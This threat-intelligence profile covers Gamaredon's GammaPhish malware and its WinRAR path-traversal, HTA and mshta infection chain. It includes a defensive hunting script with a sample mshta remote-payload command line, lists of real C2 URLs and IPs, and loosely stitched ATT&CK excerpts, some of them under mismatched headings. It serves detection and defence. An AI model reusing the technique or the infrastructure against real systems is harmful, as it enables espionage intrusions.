GammaPhish
GammaPhish is the initial-access component in Gamaredon’s modular “Gamma” malware ecosystem, as documented by Sekoia in campaigns targeting Ukrainian victims. It is attributed to Gamaredon, a Russia-linked threat actor tied to the FSB and also tracked as Armageddon, Primitive Bear, ACTINIUM, UAC-0010, and BlueAlpha. The malware was observed from late 2025 through January 2026 in cyberespionage operations against Ukrainian government, military, and critical infrastructure entities.
GammaPhish is delivered via weaponized XHTML spearphishing attachments that use HTML smuggling to drop a malicious RAR archive. The archive exploits CVE-2025-8088, a WinRAR path traversal vulnerability affecting versions prior to 7.13, to place a hidden HTA file into the user’s Windows Startup folder. On the next login, the HTA executes via mshta.exe, providing persistence and launching the next stage. The XHTML lure also sends a 1x1 tracking request to a Supabase endpoint to confirm victim engagement. In observed samples, the HTA’s remote payload URL carried a fake "www.bbc.com"-style path segment so that it would appear legitimate in network logs.
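As an added example (not code from Sekoia’s report or the Mallory platform), the following Python applies three hunting heuristics drawn from the chain above to constructed Sysmon-style events: an archiver writing an .hta into a Startup folder, mshta.exe launched with a remote URL, and a URL whose path carries a lookalike hostname that differs from the real host. The event field names, the archiver process list and the decoy-hostname list are assumptions.

```python
import re
from urllib.parse import urlparse

# Outcome of the WinRAR path traversal described above: an .hta landing in a Startup folder.
STARTUP_HTA_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.hta$", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
ARCHIVERS = {"winrar.exe", "unrar.exe"}          # assumption: archiver images to watch
DECOY_HOSTS = ("www.bbc.com",)                   # assumption: brand names seen embedded in paths


def check_decoy_path(url):
    """Flag a URL whose *path* contains a well-known hostname that is not its real host."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    return [f"decoy host {d!r} in path of {host}" for d in DECOY_HOSTS
            if d in p.path.lower() and host != d]


def check_event(ev):
    """Return finding strings for one event dict (constructed Sysmon-like schema)."""
    findings = []
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if ev.get("EventType") == "FileCreate":
        target = ev.get("TargetFilename", "")
        if image in ARCHIVERS and STARTUP_HTA_RE.search(target):
            findings.append("archiver wrote .hta into Startup: " + target)
    elif ev.get("EventType") == "ProcessCreate" and image == "mshta.exe":
        # mshta.exe pulling a remote payload is the execution step of the HTA stage.
        for url in URL_RE.findall(ev.get("CommandLine", "")):
            findings.append("mshta.exe fetching remote payload: " + url)
            findings.extend(check_decoy_path(url))
    return findings


def hunt(events):
    return [f for ev in events for f in check_event(ev)]


# Constructed sample telemetry; hosts and paths are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"EventType": "FileCreate", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.hta"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://cdn.example.invalid/www.bbc.com/news/index"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```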
Sekoia assessed with high confidence that GammaPhish is designed to deploy GammaLoad first. GammaPhish’s HTA stage retrieves a VBScript payload from command-and-control infrastructure, after which the broader chain fingerprints the host, updates registry-based network configuration through dead-drop resolvers, and can fetch and execute arbitrary VBScript payloads. The wider ecosystem includes GammaLoad for staging, GammaWorm for USB and network-share propagation, GammaSteel for file theft, and potentially GammaWipe/GamaWiper. Reporting also states that this ecosystem supports USB-based propagation across air-gapped systems, document theft, and continuous deployment of additional payloads.
The campaign uses layered dead-drop and C2 infrastructure including Telegram, Telegra.ph, graph.org, Teletype, Cloudflare Workers, and operator-controlled servers. High-confidence related indicators mentioned in the reporting include the GammaPhish XHTML sample MD5 1794369214b7f62e70a0485e61335c61; related dead-drop/C2 URLs such as https://graph.org/kyjfkyr-12-06, https://bold.zsjtn41091.workers.dev, https://teletype.in/@myrain/Xh1Lta2Ccro, https://quitethepastry.ru, https://telegra.ph/f8bfl6sp-01-02, https:/t.me/s/teotori, and https://www.telegram.me/s/oberfarir; and related C2 IP 104.194.140.6. Sekoia characterized the overall infection chain as resilient, highly obfuscated, modular, and nearly fileless, and recommended full system wiping for confirmed infections because multiple stages can independently retrieve fresh payloads.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories.
The XHTML then uses HTML smuggling to deliver a RAR archive that exploits CVE-2025-8088, a critical path traversal flaw in WinRAR patched in version 7.13.
Sekoia has now aligned the naming under a single taxonomy using the “Gamma” prefix: GammaPhish for initial access... “GammaPhish (Initial access): Through YARA-based hunting, we identified a cluster of weaponized xHTML files distributing a malicious RAR archive. This archive exploits the CVE-2025-8088 vulnerability to extract a hidden HTA file directly into the user’s Windows Startup directory.”
Applying this convention, we have established the following naming patterns: GammaPhish: All stages from the initial phishing email up to the deployment of GammaLoad (some stages are formerly known as GammaDrop, PteroDoc).
Groups observed using it
1 distinct threat actor (Gamaredon) attributed by public researchers.
Techniques & procedures
14 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (3 techniques)
Its malware ecosystem, including GammaPhish and GammaWorm, enables USB-based propagation across air-gapped systems, document theft, and continuous deployment of additional payloads.
In this campaign, Gamaredon has reorganized its arsenal into a “Gamma” ecosystem, with dedicated components for phishing (GammaPhish)... The intrusion starts with weaponized xHTML lures...
In January 2026, the experts observed the threat actor using a weaponized XHTML file, likely delivered as a spearphishing attachment.
Execution (2 techniques)
GammaPhish, which is later used to get a VBScript payload from the C2 server... retrieve and launch arbitrary VBScript payloads from the C2 servers.
This archive exploits the CVE-2025-8088 vulnerability to extract a hidden HTA file directly into the user’s Windows Startup directory.
Persistence (1 technique)
Privilege Escalation (1 technique)
Stealth (4 techniques)
the activity involves the weaponization of CVE-2025-8088, a path traversal flaw in WinRAR
The extracted HTA file contains a VBScript blob comprising approximately 90% of junk and obfuscated code.
The XHTML then uses HTML smuggling to deliver a RAR archive that exploits CVE-2025-8088, a critical path traversal flaw in WinRAR patched in version 7.13.
Upon execution, the HTA file leverages mshta.exe to call a remote payload hosted on a C2 server.
Lateral Movement (1 technique)
Collection (1 technique)
Its malware ecosystem, including GammaPhish and GammaWorm, enables USB-based propagation across air-gapped systems, document theft, and continuous deployment of additional payloads.
Command and Control (2 techniques)
update the network settings in the registry via dead drop resolvers (DDRs)... To fix C2, GammaWorm starts a GET request to the public Telegram channel.
GammaPhish... is later used to get a VBScript payload from the C2 server... retrieve and launch arbitrary VBScript payloads from the C2 servers.
Exfiltration (1 technique)
The group employs a stealthy, multi-stage infection chain that abuses legitimate Windows features and trusted services such as Telegram, Cloudflare, and cloud storage to maintain persistent access while minimizing detection.
IOCs tracked for this family
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
6 sources tracked across advisories, community write-ups, and news.
Initial access component used by Gamaredon to deliver a malicious RAR archive via weaponized XHTML/HTML smuggling, exploiting a WinRAR path traversal flaw to place an HTA file in Startup for execution.
An HTML Application payload used in the infection chain to fetch VBScript payloads from C2 and likely deploy GammaLoad first.
An HTML Application payload used in the Gamaredon infection chain to initiate execution and retrieve the intermediate VBScript downloader GammaLoad.
A named component in Gamaredon's Gamma ecosystem dedicated to phishing activity.